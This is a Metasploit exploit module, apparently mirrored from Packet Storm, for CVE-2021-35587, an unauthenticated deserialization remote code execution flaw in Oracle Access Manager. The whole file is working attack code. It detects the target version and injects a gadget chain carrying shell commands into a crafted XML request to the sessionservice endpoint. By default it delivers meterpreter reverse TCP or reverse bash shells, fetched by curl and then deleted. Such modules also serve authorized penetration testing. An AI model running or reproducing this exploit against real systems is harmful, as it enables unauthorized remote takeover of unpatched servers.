## https://sploitus.com/exploit?id=PACKETSTORM:190368
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle Access Manager unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits an unauthenticated deserialization of untrusted data vulnerability in the OpenSSO
Agent component of the Oracle Access Manager (OAM) product. The affected product versions are 11.1.2.3.0,
12.2.1.3.0, and 12.2.1.4.0.
},
'License' => MSF_LICENSE,
'Author' => [
'Jang', # Original finder and technical analysis of CVE-2021-35587 (https://x.com/testanull)
'Peterjson', # Original finder of CVE-2021-35587
'Y4er', # This exploit uses a modified gadget chain from an exploit by Y4er (https://x.com/Y4er_ChaBug)
'sfewer-r7' # Metasploit module
],
'References' => [
['CVE', '2021-35587'],
# Original Analysis of the vulnerability by the original finders, Jang & Peterjson.
['URL', 'https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316'],
# Jang describes how to get a gadget chain working.
['URL', 'https://twitter.com/testanull/status/1502114473989279744'],
# This exploit uses a modified gadget chain from CVE-2020-2883, by Y4er.
['URL', 'https://github.com/Y4er/CVE-2020-2883/blob/master/CVE_2020_2883.java'],
# CVE-2021-35587 was patched by Oracle in Jan 2022.
['URL', 'https://www.oracle.com/security-alerts/cpujan2022.html']
],
'DisclosureDate' => '2022-01-19',
'Platform' => [ 'linux', 'unix', 'win' ],
'Arch' => [ARCH_CMD],
'Privileged' => false, # On Linux, executes as the user 'oracle'.
'Targets' => [
[
'Linux Command', {
'Platform' => [ 'linux', 'unix' ],
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/https/x64/meterpreter_reverse_tcp',
# A writable directory on the target for fetch based payloads to write to.
'FETCH_WRITABLE_DIR' => '/tmp'
}
}
],
[
'Windows Command', {
'Platform' => 'win',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/https/x64/meterpreter_reverse_tcp',
# A writable directory on the target for fetch based payloads to write to.
'FETCH_WRITABLE_DIR' => '%TEMP%'
}
}
],
# OAM can run on HP-UX, IBM AIX, and Solaris, so we have a separate Unix target for these.
[
'Unix Command', {
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
],
'DefaultOptions' => {
'RPORT' => 14100,
'SSL' => false,
'FETCH_COMMAND' => 'CURL',
# Delete the fetch binary after execution.
'FETCH_DELETE' => true
},
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
# By default, Oracle Access Manager is deployed on WebLogic under the path /oam/
OptString.new('TARGETURI', [ true, 'The base path to the OAM application', '/oam/'])
]
)
end
def check
detected_version = get_version
if detected_version
detected_description = "Oracle Access Manager #{detected_version}."
# According to Oracle, these 3 versions are affected.
affected_versions = [
'11.1.2.3.0',
'12.2.1.3.0',
'12.2.1.4.0'
]
affected_versions.each do |affected_version|
return CheckCode::Appears(detected_description) if detected_version == Rex::Version.new(affected_version)
end
return CheckCode::Safe(detected_description)
end
# By here we think the target is OAM, but we did not get a version number from the response body, so
# we cannot do a version based check to determine if vulnerable or safe.
CheckCode::Detected
rescue Msf::Exploit::Failed => e
return Exploit::CheckCode::Unknown(e.message)
end
def exploit
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'server', 'opensso', 'sessionservice'),
'ctype' => 'text/xml',
'data' => get_xml
)
fail_with(Failure::UnexpectedReply, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
end
def get_xml
gadget_b64 = Base64.strict_encode64(get_gadget)
requester_b64 = Base64.strict_encode64("object:#{gadget_b64}")
attr_authidentifier = {
'reqid' => Rex::Text.rand_text_alphanumeric(8..32),
'requester' => requester_b64
}.to_a.shuffle.to_h
builder_authidentifier = Nokogiri::XML::Builder.new do |xml|
xml.authIdentifier(attr_authidentifier) do |xml_authidentifier|
xml_authidentifier.SessionID Rex::Text.rand_text_alphanumeric(8..32)
end
end
attr_requestset = {
'svcid' => 'session',
'reqid' => Rex::Text.rand_text_alphanumeric(8..32),
'vers' => Rex::Text.rand_text_alphanumeric(8..32)
}.to_a.shuffle.to_h
attr_request = {
'dtdid' => Rex::Text.rand_text_alphanumeric(8..32),
'sid' => Rex::Text.rand_text_alphanumeric(8..32)
}.to_a.shuffle.to_h
builder_root = Nokogiri::XML::Builder.new(encoding: 'UTF-8') do |xml|
xml.RequestSet(attr_requestset) do |xml_requestset|
xml_requestset.Request(attr_request) do |xml_request|
xml_request.cdata(builder_authidentifier.to_xml)
end
end
end
xml_data = builder_root.to_xml
vprint_status('Using XML:')
vprint_line(xml_data)
xml_data
end
def get_gadget
detected_version = get_version
gadget_file = nil
case detected_version
when Rex::Version.new('12.2.1.4.0')
gadget_file = 'gadget_12.2.1.4.0.bin'
when Rex::Version.new('12.2.1.3.0')
gadget_file = 'gadget_12.2.1.3.0.bin'
else
fail_with(Failure::NoTarget, "No suitable gadget chain for this version: #{detected_version}.")
end
# See ./data/exploits/CVE-2021-35587/gadget.java for how we generate the gadget bin files.
gadget_data = ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-35587', gadget_file))
shell_name = nil
shell_arg = nil
if (target.platform.platforms & [Msf::Module::Platform::Linux, Msf::Module::Platform::Unix]).any?
shell_name = '/bin/sh'
shell_arg = '-c'
elsif target.platform.platforms.include? Msf::Module::Platform::Windows
shell_name = 'cmd.exe'
shell_arg = '/C'
else
fail_with(Failure::BadConfig, "No gadget shell support for target #{target['Platform']}.")
end
{
'EXEC_ARG0' => shell_name,
'EXEC_ARG1' => shell_arg,
'EXEC_ARG2' => payload.encoded
}.each do |key, value|
gadget_data.gsub!(
[key.length].pack('n') + key,
[value.length].pack('n') + value
)
end
vprint_status("Using gadget (#{gadget_file}):")
vprint_line(Rex::Text.to_hex_dump(gadget_data))
gadget_data
end
def get_version
# This unauthenticated endpoint will conveniently report the OAM product version number.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'pages', 'impconsent.jsp')
)
fail_with(Failure::UnexpectedReply, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
# We expect a response to have one or both of these HTTP headers.
unless res.headers.key?('X-ORACLE-DMS-RID') || res.headers.key?('X-ORACLE-DMS-ECID')
fail_with(Failure::UnexpectedReply, 'No X-ORACLE-DMS-RID or X-ORACLE-DMS-ECID HTTP header seen')
end
unless res.body =~ /Oracle Access Management Version: (\d+\.\d+\.\d+\.\d+\.\d+)/
fail_with(Failure::UnexpectedReply, 'Unable to determine target version')
end
Rex::Version.new(Regexp.last_match(1))
end
end